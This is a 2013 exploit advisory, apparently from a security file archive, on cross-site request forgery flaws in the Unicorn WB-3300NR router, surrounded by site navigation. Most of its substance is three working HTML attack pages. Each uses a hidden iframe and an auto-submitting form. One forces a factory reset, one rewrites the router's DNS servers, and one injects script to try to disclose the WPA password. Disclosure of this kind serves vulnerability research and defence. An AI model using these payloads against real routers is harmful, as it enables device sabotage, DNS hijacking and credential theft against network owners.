Unicorn WB-3300NR Cross Site Request Forgery

Unicorn WB-3300NR Cross Site Request Forgery: Posted Oct 31, 2013; Authored by absane; Unicorn WB-3300NR router version 1 with firmware 5.07.18_ko_UIS02 suffers from multiple cross site request forgery vulnerabilities.; tags | exploit, vulnerability, csrf; MD5 | 3307c9e56dd0e79df8322d14a7bc1ac4; Download | Favorite | Comments (0)

Unicorn WB-3300NR Cross Site Request Forgery

# Exploit Title:     Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)
# Exploit Author:    absane
# Blog:              http://blog.noobroot.com
# Discovery date:    October 29th 2013   
# Vendor Homepage:   http://www.eunicorn.co.kr/kimsboard7/_product.php?inc=wb-3300nr    
# Tested on:         Unicorn WB-3300NR v1.0
# Firmware Version:  V5.07.18_ko_UIS02       

***************
*Vulnerability*
***************
The WB-3300NR Unicorn Router suffers from numerous CSRF vulnerabilities.
Considering that by default the administrative pages do not require authentication, countless exploits exist.

******************
*Proof of Concept*
******************

1) Factory Reset

<html><body>
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/SysToolRestoreSet" method="post" target="cantseeme">
<input type="hidden" name="CMD" value='SYS_CONF'>
<input type="hidden" name="GO" value='system_reboot.asp'>
<input type="hidden" name="CCMD" value='0'>
<script>document.csrf_form.submit();</script>
</body></html>


2) Alter the DNS Settings

<html><body>
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/AdvSetDns" method="post" target="cantseeme">
<input type="hidden" name="GO" value='wan_dns.asp'>
<input type="hidden" name="rebootTag" value=''>
<input type="hidden" name="DSEN" value='1'>
<input type="hidden" name="DNSEN" value='on'>
<input type="hidden" name="DS1" value='8.8.4.4'>
<input type="hidden" name="DS2" value='8.8.8.8'>
<script>document.csrf_form.submit();</script>
</body></html>


3) WPA Password Disclosure (possibility)(not proven)

The following PoC code only demostrates that with CSRF and XSS, it might be possible to obtain the WPA password.
However, I have been unable to do so without forcing the router to revert to factory defaults.

<html><body>
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/WizardHandle" method="post" target="cantseeme">
<input type="hidden" name="MACC" value='"; var x = ""; function y() {alert(def_wirelesspassword);} x = window.setTimeout(y,2000);//'>
<script>document.csrf_form.submit();</script>
</body></html>

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Red Hat 50 files
Ubuntu 43 files
Debian 25 files
HP 11 files
Jing Wang 10 files
Benjamin Kunz Mejri 9 files
Steffen Roesemann 8 files
Mandriva 8 files
hadji samir 7 files
Denis Andzakovic 7 files

File Archives

Systems

AIX (386)
Apple (1,212)
BSD (309)
Cisco (1,522)
Debian (4,648)
Fedora (1,665)
FreeBSD (1,113)
Gentoo (2,980)
HPUX (795)
iOS (63)
iPhone (102)
IRIX (219)
Juniper (66)
Linux (26,720)
Mac OS X (527)
Mandriva (2,901)
NetBSD (245)
OpenBSD (428)
RedHat (4,215)
Slackware (595)
Solaris (1,540)
SUSE (1,440)
Ubuntu (4,052)
UNIX (7,515)
UnixWare (157)
Windows (4,537)
Other

Unicorn WB-3300NR Cross Site Request Forgery

Unicorn WB-3300NR Cross Site Request Forgery

Comments

File Archive:

February 2015

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Unicorn WB-3300NR Cross Site Request Forgery

Share This

Unicorn WB-3300NR Cross Site Request Forgery

Comments

File Archive:

February 2015

Top Authors In Last 30 Days

File Tags

File Archives

Systems